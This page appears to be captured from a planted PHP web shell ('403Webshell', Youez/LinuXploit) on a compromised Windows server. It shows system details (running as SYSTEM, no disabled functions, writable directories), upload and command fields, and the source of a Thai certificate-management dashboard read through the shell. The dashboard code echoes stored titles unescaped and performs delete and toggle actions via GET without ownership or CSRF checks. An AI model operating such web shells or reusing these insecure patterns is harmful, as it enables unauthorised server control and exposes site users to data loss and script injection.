403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/certificate/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/certificate//dashboard.php
<?php
require 'db.php';
checkSingleSession();
if(!isset($_SESSION['user_id'])) { header("Location: login.php"); exit; }

$role = $_SESSION['role'];
$uid = $_SESSION['user_id'];

// AJAX จัดการแสดงตาราง
if(isset($_GET['ajax_dash'])) {
    $search = mysqli_real_escape_string($condb, $_GET['q']);
    $page = isset($_GET['page']) ? (int)$_GET['page'] : 1;
    $limit = 10;
    $offset = ($page - 1) * $limit;

    $where = "WHERE c.event_title LIKE '%$search%'";
    if($role != 'admin') {
        $where .= " AND c.user_id = '$uid'";
    }

    $count_q = mysqli_query($condb, "SELECT COUNT(*) as cnt FROM cert_events c $where");
    $total_rows = mysqli_fetch_assoc($count_q)['cnt'];
    $total_pages = ceil($total_rows / $limit);

    $q = mysqli_query($condb, "SELECT c.*, u.group_name FROM cert_events c LEFT JOIN users u ON c.user_id = u.user_id $where ORDER BY c.event_id DESC LIMIT $offset, $limit");
    
    $html = '';
    $no = $offset + 1; 
    
    while($row = mysqli_fetch_assoc($q)) {
        $enc_id = encryptData($row['event_id']);
        $date_th = getThaiDate($row['event_date']);
        
        $count_names = mysqli_fetch_assoc(mysqli_query($condb, "SELECT COUNT(*) as c FROM cert_names WHERE event_id='{$row['event_id']}'"))['c'];
        
        // การแสดงสถานะ และปุ่มสลับ
        $status_badge = ($row['status'] == 1) ? "<span class='badge bg-success'><i class='fas fa-eye'></i> แสดงผล</span>" : "<span class='badge bg-secondary'><i class='fas fa-eye-slash'></i> ซ่อนไว้</span>";
        $toggle_btn = ($row['status'] == 1) ? "<a href='dashboard.php?toggle=$enc_id' class='btn btn-sm btn-outline-secondary' title='ซ่อนไม่ให้คนเห็น'><i class='fas fa-eye-slash'></i> ซ่อน</a>" : "<a href='dashboard.php?toggle=$enc_id' class='btn btn-sm btn-outline-success' title='เปิดแสดงผลที่หน้าแรก'><i class='fas fa-eye'></i> เปิดแสดง</a>";

        $html .= "<tr>
            <td class='align-middle text-center fw-bold'>$no</td>
            <td class='align-middle'>{$row['event_title']}</td>
            <td class='align-middle text-center'>$date_th</td>";
        if($role == 'admin') {
            $html .= "<td class='align-middle text-center'><span class='badge bg-info text-dark'>{$row['group_name']}</span></td>";
        }
        $html .= "<td class='align-middle text-center'>$status_badge</td>
            <td class='align-middle text-center'><span class='badge bg-dark'>$count_names คน</span></td>
            <td class='align-middle text-center'>
                $toggle_btn
                <a href='manage_event.php?eid=$enc_id' class='btn btn-sm btn-warning text-dark'><i class='fas fa-edit'></i> จัดการ</a>
                <a href='dashboard.php?del=$enc_id' class='btn btn-sm btn-danger' onclick=\"return confirm('ยืนยันการลบข้อมูลนี้ รวมถึงรายชื่อทั้งหมด?');\"><i class='fas fa-trash'></i> ลบ</a>
            </td>
        </tr>";
        $no++;
    }
    
    $colspan = ($role == 'admin') ? 7 : 6;
    if(mysqli_num_rows($q) == 0) $html = "<tr><td colspan='$colspan' class='text-center py-4 text-muted'>ไม่พบข้อมูลเกียรติบัตร</td></tr>";

    echo json_encode(['html' => $html, 'pagination' => createPagination($total_pages, $page, 'loadDash')]);
    exit;
}

// ระบบสลับสถานะ (แสดง / ซ่อน)
if(isset($_GET['toggle'])) {
    $toggle_id = decryptData($_GET['toggle']);
    if($toggle_id) {
        // ใช้คำสั่งสลับค่า boolean (NOT status)
        mysqli_query($condb, "UPDATE cert_events SET status = NOT status WHERE event_id='$toggle_id'");
    }
    header("Location: dashboard.php"); exit;
}

// ระบบลบข้อมูล
if(isset($_GET['del'])) {
    $del_id = decryptData($_GET['del']);
    if($del_id) {
        $check_q = mysqli_query($condb, "SELECT template_bg_1, template_bg_2, template_bg_3 FROM cert_events WHERE event_id='$del_id'");
        $bg = mysqli_fetch_assoc($check_q);
        if($bg['template_bg_1'] && file_exists("img/".$bg['template_bg_1'])) @unlink("img/".$bg['template_bg_1']);
        if($bg['template_bg_2'] && file_exists("img/".$bg['template_bg_2'])) @unlink("img/".$bg['template_bg_2']);
        if($bg['template_bg_3'] && file_exists("img/".$bg['template_bg_3'])) @unlink("img/".$bg['template_bg_3']);
        
        mysqli_query($condb, "DELETE FROM cert_events WHERE event_id='$del_id'");
        mysqli_query($condb, "DELETE FROM cert_names WHERE event_id='$del_id'");
    }
    header("Location: dashboard.php"); exit;
}

require 'layout.php';
renderHeader("แผงควบคุม - ระบบเกียรติบัตร");
?>
<div class="row mt-4 mb-5">
    <div class="col-12">
        <div class="card p-4 shadow-sm border-top border-4 border-primary">
            <div class="d-flex flex-column flex-md-row justify-content-between align-items-center mb-4">
                <h4 class="fw-bold text-primary m-0 mb-3 mb-md-0"><i class="fas fa-list"></i> จัดการข้อมูลเกียรติบัตร</h4>
                <div>
                    <?php if($role == 'admin'): ?>
                    <a href="#" class="btn btn-outline-info text-dark me-2 fw-bold"><i class="fas fa-users"></i> จัดการ Users (Admin)</a>
                    <?php endif; ?>
                    <a href="manage_event.php" class="btn btn-success fw-bold"><i class="fas fa-plus"></i> เพิ่มเรื่องใหม่</a>
                </div>
            </div>
            
            <div class="row mb-3">
                <div class="col-md-5">
                    <div class="input-group">
                        <span class="input-group-text bg-white"><i class="fas fa-search text-muted"></i></span>
                        <input type="text" id="dashSearch" class="form-control" placeholder="ค้นหาชื่อเรื่องเกียรติบัตร..." onkeyup="loadDash(1)">
                    </div>
                </div>
            </div>

            <div class="table-responsive">
                <table class="table table-bordered table-hover">
                    <thead class="table-light text-center">
                        <tr>
                            <th width="5%">ที่</th>
                            <th>ชื่อเรื่องเกียรติบัตร</th>
                            <th width="15%">วันที่ออก</th>
                            <?php if($role == 'admin') echo '<th width="20%">ผู้สร้าง (หน่วยงาน)</th>'; ?>
                            <th width="10%">สถานะ</th>
                            <th width="10%">จำนวนชื่อ</th>
                            <th width="20%">จัดการ</th>
                        </tr>
                    </thead>
                    <tbody id="dashList">
                        <?php $colspan = ($role == 'admin') ? 7 : 6; ?>
                        <tr><td colspan="<?php echo $colspan; ?>" class="text-center py-5"><i class="fas fa-spinner fa-spin fa-2x text-primary"></i> <span class="d-block mt-2 text-muted">กำลังโหลดข้อมูล...</span></td></tr>
                    </tbody>
                </table>
            </div>
            <div id="dashPagination" class="mt-3"></div>
        </div>
    </div>
</div>

<script>
let dashTimeout;
function loadDash(page) {
    clearTimeout(dashTimeout);
    dashTimeout = setTimeout(() => {
        let q = document.getElementById('dashSearch').value;
        fetch('dashboard.php?ajax_dash=1&page=' + page + '&q=' + encodeURIComponent(q))
        .then(res => res.json())
        .then(data => {
            document.getElementById('dashList').innerHTML = data.html;
            document.getElementById('dashPagination').innerHTML = data.pagination;
        });
    }, 300);
}
document.addEventListener('DOMContentLoaded', () => loadDash(1));
</script>
<?php renderFooter(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit